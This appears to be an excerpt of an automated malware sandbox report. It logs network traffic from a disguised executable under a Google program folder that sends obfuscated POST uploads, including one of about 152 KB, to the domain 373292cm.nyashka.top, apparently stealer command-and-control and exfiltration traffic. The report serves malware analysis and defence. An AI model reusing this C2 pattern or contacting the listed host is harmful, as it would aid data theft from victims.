                                    Aug 25, 2024 15:47:04.920119047 CEST804980980.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:04.964543104 CEST4980980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.038048029 CEST4980980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.038691998 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.047040939 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.047053099 CEST804980980.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.047136068 CEST4980980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.047148943 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.047229052 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.052057981 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.402195930 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.410562038 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.411101103 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.411112070 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.743324041 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.792659044 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.942663908 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.995727062 CEST4981080192.168.2.880.211.144.156

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 25, 2024 15:45:43.624114990 CEST5312353192.168.2.81.1.1.1
                                    Aug 25, 2024 15:45:43.815149069 CEST53531231.1.1.1192.168.2.8

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 25, 2024 15:45:43.624114990 CEST192.168.2.81.1.1.10xbdeeStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 25, 2024 15:45:43.815149069 CEST1.1.1.1192.168.2.80xbdeeNo error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • 373292cm.nyashka.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.84970780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:43.853141069 CEST345OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:44.200010061 CEST344OUTData Raw: 00 0b 04 0c 06 0a 01 0b 05 06 02 01 02 01 01 04 00 05 05 0b 02 04 03 0a 07 00 0c 06 03 05 02 00 0f 01 06 0b 03 07 05 03 0e 0b 07 01 06 0b 04 06 04 06 0b 00 0f 04 01 03 06 0e 03 02 05 0b 06 01 00 51 0f 0d 07 53 07 04 0d 05 0c 52 0a 02 0d 04 07 0c
                                    Data Ascii: QSRY]Q\L}QhNzw[rXwfpkoiclw^ks_xoo{NTI|mcTtti_~V@{CnL}ry
                                    Aug 25, 2024 15:45:44.549909115 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:44.648998022 CEST1236INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 1320
                                    Connection: keep-alive
                                    Data Raw: 56 4a 7d 5d 7b 6e 7c 5a 79 71 6b 5a 7c 71 56 5b 7c 77 5d 09 7f 5e 5b 08 6d 5d 5d 5e 7f 62 73 58 77 63 61 0c 6d 61 71 02 62 76 56 00 6a 61 78 01 55 4b 71 09 74 5c 7f 4b 7f 04 75 04 7f 5e 62 0d 79 66 60 08 7e 73 7f 4a 62 62 5f 06 60 58 6a 59 7e 62 62 02 7f 7f 70 4e 7e 5e 77 06 62 5c 7b 06 7c 5c 72 59 7c 60 79 03 7b 77 6b 5e 7b 67 73 5f 78 7d 74 59 7a 5b 73 5a 7a 63 54 4f 7f 06 73 5b 79 67 78 01 7e 04 64 5e 61 4f 70 02 7a 51 41 5b 68 5e 7c 40 7f 71 6e 54 76 52 6b 5f 6f 6c 74 03 77 06 6e 0d 79 62 6d 47 6a 42 54 06 6f 72 66 46 77 63 5e 5a 76 07 64 07 76 71 7a 50 7e 5d 7a 06 76 71 7d 04 76 66 63 50 7f 52 66 58 77 7c 7f 5d 7c 73 6f 59 78 6f 7b 03 6f 60 66 4a 6b 6d 78 08 74 74 7c 04 69 62 66 09 6a 6e 70 52 7b 43 65 5e 7d 71 7d 40 7b 5d 46 51 6b 52 5d 52 7d 60 56 0b 7d 77 75 5d 6c 6d 7b 49 7b 71 64 00 7e 71 78 5b 7e 49 55 0a 68 4e 5c 55 7b 63 78 07 7d 61 7c 49 63 5a 7d 51 7b 5c 79 06 75 66 56 4b 7e 58 56 06 7e 66 71 0d 76 72 73 06 7f 5c 5b 05 7f 67 6a 0d 7b 58 74 09 7e 73 67 02 76 62 75 02 76 71 69 00 7c 4f [TRUNCATED]
                                    Data Ascii: VJ}]{n|ZyqkZ|qV[|w]^[m]]^bsXwcamaqbvVjaxUKqt\Ku^byf`~sJbb_`XjY~bbpN~^wb\{|\rY|`y{wk^{gs_x}tYz[sZzcTOs[ygx~d^aOpzQA[h^|@qnTvRk_oltwnybmGjBTorfFwc^ZvdvqzP~]zvq}vfcPRfXw|]|soYxo{o`fJkmxtt|ibfjnpR{Ce^}q}@{]FQkR]R}`V}wu]lm{I{qd~qx[~IUhN\U{cx}a|IcZ}Q{\yufVK~XV~fqvrs\[gj{Xt~sgvbuvqi|Or~|t@~gDuOY{Ly~`iywtxg^MxSYHybdHzcz}``{gx~\svap||Q}g`|qaAv|Zx|tIt`byqeJ~RfxOfFvsswa^var|NrtLiBv[`RyLwRp|]hJxBz`v}`wgR~rvB}SU{mnN}\y}pxAlZNph}YT{CQ{bt~qg}wQ@~`Wys^M}rtFtMqBzO[IuHZ}f|}vu@wbQ\}|gzxXZO~ssubaAtOiqbI~BlA~IUuO{rqI}N_{whywpxCQzblHxsPL{]NZxYsY~qx\wa|}BUYh@}bqAvRwZolUYw^vzqm}BT_z\yvxBagx[L~Jx^bcrT^veoSkRv^wk_|p|K{oglNXh}l`g^jaqTzSYQfn^jfbQYwRS{@QlkPWta^o~Zzu{Z|Xg}Yg~puncx~rtK`]amOj^vcY|fdfive{WOz[hdNTzoVR`V[[nN]bnJUvzyRRL~wkFua{Jy\uJz]OZloBUtAl^Do{AQ\_}]s|lkVTdaNYLwtR`d{ZFQhbO[Ao]Da}UnXFQQz|^]\NtiZDp\@PkeAZq@bUMizYcUCS\wElc[z]zZ~zsWcdAR~aVRn^VTaXQaB [TRUNCATED]
                                    Aug 25, 2024 15:45:44.649020910 CEST241INData Raw: 44 50 7e 66 5b 53 64 06 5f 6f 00 00 09 51 59 60 49 5d 63 0d 5e 5b 62 6d 59 7e 5c 79 67 52 55 59 09 6a 64 63 54 6d 06 60 58 51 71 6e 4a 7a 73 01 5e 7f 76 7f 40 6c 6b 73 45 6f 0b 77 58 7b 75 7f 5f 6f 60 0e 41 50 7c 6f 5d 57 64 00 55 6a 04 0f 42 5c
                                    Data Ascii: DP~f[Sd_oQY`I]c^[bmY~\ygRUYjdcTm`XQqnJzs^v@lksEowX{u_o`AP|o]WdUjB\rYEiocShf}qQpE|UU][uJPbP@QT\WY`_Z[gy`bUx^\^p_O\boNRHcU@iA[RZQca_{SVPpZN_jaNP~No[ChHAPYUHVpoRjgxzZ~G|TV_TsBUbVCQ_PcTQZ@je|p^zRm
                                    Aug 25, 2024 15:45:44.680274963 CEST321OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 384
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:44.891242027 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:44.891619921 CEST384OUTData Raw: 5a 50 59 55 51 42 54 51 5b 5f 5a 51 59 5e 58 5f 57 5d 5d 5f 57 5c 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZPYUQBTQ[_ZQY^X_W]]_W\SXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.\/#"=<7>=7+>^+=/ Z##<W?9743=X.>&F$.Y/
                                    Aug 25, 2024 15:45:45.190363884 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 28 35 26 11 25 3b 0a 50 30 0d 39 0b 2a 13 23 59 2a 2d 03 5c 24 3b 21 14 25 3e 20 1d 27 2b 31 59 28 10 29 0e 32 11 33 58 2e 24 2b 5d 0c 13 21 07 20 3a 26 5a 26 5a 3c 10 2a 16 02 03 21 2f 2a 1e 28 3a 25 18 3c 06 20 12 2b 3a 34 04 2b 29 3e 1e 2e 3b 3a 05 2e 20 2e 56 23 14 2b 52 0d 11 24 54 28 3d 0b 56 2a 3d 2b 14 36 3b 24 01 24 13 2a 54 25 22 26 1e 30 17 02 12 26 21 2a 0e 27 0f 04 0e 31 3b 31 07 26 2f 07 50 22 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W(5&%;P09*#Y*-\$;!%> '+1Y()23X.$+]! :&Z&Z<*!/*(:%< +:4+)>.;:. .V#+R$T(=V*=+6;$$*T%"&0&!*'1;1&/P""#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.84970880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:44.873883963 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:45.232837915 CEST2544OUTData Raw: 5a 56 59 50 54 49 51 5c 5b 5f 5a 51 59 53 58 51 57 5b 5d 5b 57 5a 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZVYPTIQ\[_ZQYSXQW[][WZS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y,6.$\ %X+=<X5Z)='X"<!2?("08&F$.Y/5
                                    Aug 25, 2024 15:45:45.548530102 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:45.747013092 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.84971180.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:45.339277029 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:45.683351994 CEST1860OUTData Raw: 5f 52 59 53 51 47 51 5e 5b 5f 5a 51 59 5e 58 57 57 5e 5d 52 57 58 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _RYSQGQ^[_ZQY^XWW^]RWXSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.]/!8\ #%>4Y+>5_)>;\4,#0S*)8" /.&F$.Y/
                                    Aug 25, 2024 15:45:46.004705906 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:46.201056957 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1f 2a 0b 3e 11 26 5d 3c 18 24 0a 31 0f 2b 3e 23 12 3e 03 25 14 25 28 35 5c 25 10 24 50 24 3b 29 58 2b 3d 2d 0f 26 3f 2f 11 2d 24 2b 5d 0c 13 21 07 34 39 39 04 26 2c 20 13 29 28 0a 06 21 02 21 02 3f 03 3d 18 2b 2c 23 02 28 5f 27 1e 2a 2a 04 57 2f 16 07 5a 2d 09 3a 55 23 3e 2b 52 0d 11 24 55 2b 13 3d 54 3e 58 2b 5d 36 06 3b 58 27 5b 3d 0e 32 32 2e 1d 33 2a 3c 58 32 31 3d 51 33 1f 36 0d 26 5d 3e 12 25 2f 0f 50 23 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &*>&]<$1+>#>%%(5\%$P$;)X+=-&?/-$+]!499&, )(!!?=+,#(_'**W/Z-:U#>+R$U+=T>X+]6;X'[=22.3*<X21=Q36&]>%/P#2#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.84971280.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:45.979459047 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:46.323940992 CEST2544OUTData Raw: 5a 56 5c 5e 54 42 54 5f 5b 5f 5a 51 59 51 58 56 57 5d 5d 59 57 50 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^TBT_[_ZQYQXVW]]YWPS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3;E">+40Z)-,(=)\([ #< +3_# !Y;>&F$.Y/=
                                    Aug 25, 2024 15:45:46.655853033 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:46.791594028 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.84971480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:47.247595072 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:47.606041908 CEST2536OUTData Raw: 5f 57 5c 52 54 40 54 5e 5b 5f 5a 51 59 57 58 53 57 5d 5d 5f 57 5c 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _W\RT@T^[_ZQYWXSW]]_W\SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y,0"- 4=Z+><Y(>"?[+[4# 1$W+*;^4%Y,&F$.Y/5
                                    Aug 25, 2024 15:45:47.927711010 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:48.127664089 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.84971580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:48.437699080 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:48.792576075 CEST2544OUTData Raw: 5a 57 59 52 54 49 54 59 5b 5f 5a 51 59 52 58 5e 57 51 5d 5b 57 50 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZWYRTITY[_ZQYRX^WQ][WPSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;?6'75>(^>-=[<.?Y < 4$*)?^"3!_,.&F$.Y/1
                                    Aug 25, 2024 15:45:49.110965014 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:49.239625931 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.84971780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:49.450839043 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.84971880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:45:49.728526115 CEST348OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 152740
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:50.093872070 CEST12360OUTData Raw: 5a 55 5c 54 54 43 51 5d 5b 5f 5a 51 59 50 58 51 57 5e 5d 5e 57 5b 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZU\TTCQ][_ZQYPXQW^]^W[S[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-; /D!#0!+=<X5<=< Z?W7+#401]/>&F$.Y/
                                    Aug 25, 2024 15:45:50.099086046 CEST4944OUTData Raw: 2b 05 2b 1a 24 17 0d 1e 07 2b 10 57 38 38 08 3b 01 31 35 37 34 00 06 37 27 2c 37 3d 3f 5b 5c 11 29 04 16 1c 0f 39 09 1d 38 3c 0f 2b 0f 23 31 23 38 5e 27 2c 0a 31 18 0e 39 1f 04 32 31 03 2d 39 24 11 3e 57 3b 1c 38 2d 07 2c 3a 5e 04 38 5c 5d 08 38
                                    Data Ascii: ++$+W88;15747',7=?[\)98<+#1#8^',1921-9$>W;8-,:^8\]8D-=1>&>%_!?X)Z?-=8 S'=!).??A;<?71'9?97<(X !;<8 _&V&35B:4[83V>X#4$09S>,V#8,"5"<'+'""W1,68+8"=[Z)5:<$0!;[)<1*0
                                    Aug 25, 2024 15:45:50.099102974 CEST4944OUTData Raw: 3e 38 01 2d 2b 10 1c 1b 3f 13 1a 1d 24 38 5e 1d 3b 58 26 03 38 10 3c 11 22 06 08 19 3a 21 24 1e 3d 08 13 1e 30 33 0d 09 3f 2a 48 20 34 55 1c 5b 05 5b 28 58 10 5b 2d 5f 03 2c 06 1a 34 04 16 54 3c 56 05 11 00 25 02 2b 09 2c 2a 02 3b 3a 0c 07 34 06
                                    Data Ascii: >8-+?$8^;X&8<":!$=03?*H 4U[[(X[-_,4T<V%+,*;:4+$38+-TU00&+<4/"107*3><$-0.U 8?2;?^<[*8/93)?R9691>7!80[506)%Z',<;(<V0*^:.,9<_[T?\W.59[[ >),>++-$6.T-?&
                                    Aug 25, 2024 15:45:50.099158049 CEST2472OUTData Raw: 02 5c 54 05 06 2f 09 5a 2b 54 0c 1e 27 55 24 3a 3d 3a 02 5e 34 0d 51 19 36 27 56 23 04 29 17 2b 39 5d 59 1b 39 20 03 30 2a 02 0a 12 30 3c 32 23 3c 5c 5d 1b 3e 2e 0a 54 0d 38 0c 04 04 22 0f 28 31 5b 53 38 06 32 0e 28 3c 58 04 16 0f 29 52 1f 27 59
                                    Data Ascii: \T/Z+T'U$:=:^4Q6'V#)+9]Y9 0*0<2#<\]>.T8"(1[S82(<X)R'Y:$;[5'<)";$.39$(97!(0Y2&]+U<!=8;(8$,200\;U&4U!87[6!#4ZP1Z"(-/?".>9^U?X_82+W)>>"A>[;&":>,!/4)?(&:<$= '
                                    Aug 25, 2024 15:45:50.099172115 CEST4944OUTData Raw: 04 3e 26 3c 05 33 3c 5f 3e 28 44 02 05 00 1c 27 27 5a 5e 5c 26 3a 39 33 0b 03 08 31 23 07 1e 1f 21 3c 26 58 0f 55 09 32 0c 2d 29 3a 02 0a 12 1c 0e 2d 15 5d 22 23 45 2b 36 3d 33 3b 12 32 3a 19 37 5a 34 01 34 5a 2f 18 0f 08 3f 34 30 25 34 5f 23 30
                                    Data Ascii: >&<3<_>(D''Z^\&:931#!<&XU2-):-]"#E+6=3;2:7Z44Z/?40%4_#0!^6E0*^)=$Z4V;!"07?U?)6X18\4$0)X+*X;^:><;V;*>+95V(!>1%?12 Y*+ 7>05>)9]Q&4"0&T2]5!5VVS?UC!40=2&#:;&&S8UT
                                    Aug 25, 2024 15:45:50.099205971 CEST2472OUTData Raw: 3e 55 18 58 2f 03 0b 28 03 02 0a 59 03 5a 34 3e 3c 56 29 1f 39 57 28 03 0a 24 30 5e 06 20 01 32 3b 30 39 2a 2a 26 21 5e 24 5c 27 38 0b 22 07 53 07 58 27 10 3e 31 3a 1c 0b 00 3d 1f 27 2d 11 50 27 05 2e 59 30 2e 39 50 09 2c 05 13 06 31 0a 24 30 39
                                    Data Ascii: >UX/(YZ4><V)9W($0^ 2;09**&!^$\'8"SX'>1:='-P'.Y0.9P,1$09R<("'[[58$>$5(]>3#%8?"R5-R#.>T%14\5\2198"1:'?=H' 9&-6UC:6Y"(=7^3]724\?_'=:3$?2(&Y,>!"!0?*=)"56=*.-7<=&6<
                                    Aug 25, 2024 15:45:50.099229097 CEST2472OUTData Raw: 3a 2f 22 04 35 0b 06 57 37 21 04 1d 2a 06 34 19 08 17 2b 3e 33 2e 32 0d 14 2d 16 26 3a 35 3d 25 3a 5a 32 07 23 10 38 17 3e 04 3d 59 08 09 28 56 08 56 03 18 32 55 06 27 21 04 3c 5e 37 31 40 5d 37 3c 34 5e 2b 59 2e 04 03 02 06 23 0e 05 2c 15 21 23
                                    Data Ascii: :/"5W7!*4+>3.2-&:5=%:Z2#8>=Y(VV2U'!<^71@]7<4^+Y.#,!##3_; #,=(96Y<<W/<93)#]0T;_5B1.=> -1<80Y+'&8"+&?80ZV+$/8'1;X'/!4;=1 ]7;WY!"(\6"=&:<2+<.;]/3%90&.+,V=.#8^>!*V8
                                    Aug 25, 2024 15:45:50.099266052 CEST2472OUTData Raw: 3b 2c 3d 15 22 17 5a 3c 39 03 54 19 01 06 20 19 24 5a 35 20 05 5d 00 15 24 2f 0a 5f 3c 39 09 5a 00 03 32 55 37 5d 00 2a 2c 1e 2d 12 22 38 0a 32 3b 2e 2b 10 32 2d 04 1d 31 29 4b 3d 21 01 24 13 0c 2f 29 11 3d 23 2d 06 0d 38 33 5e 0c 0c 36 54 30 21
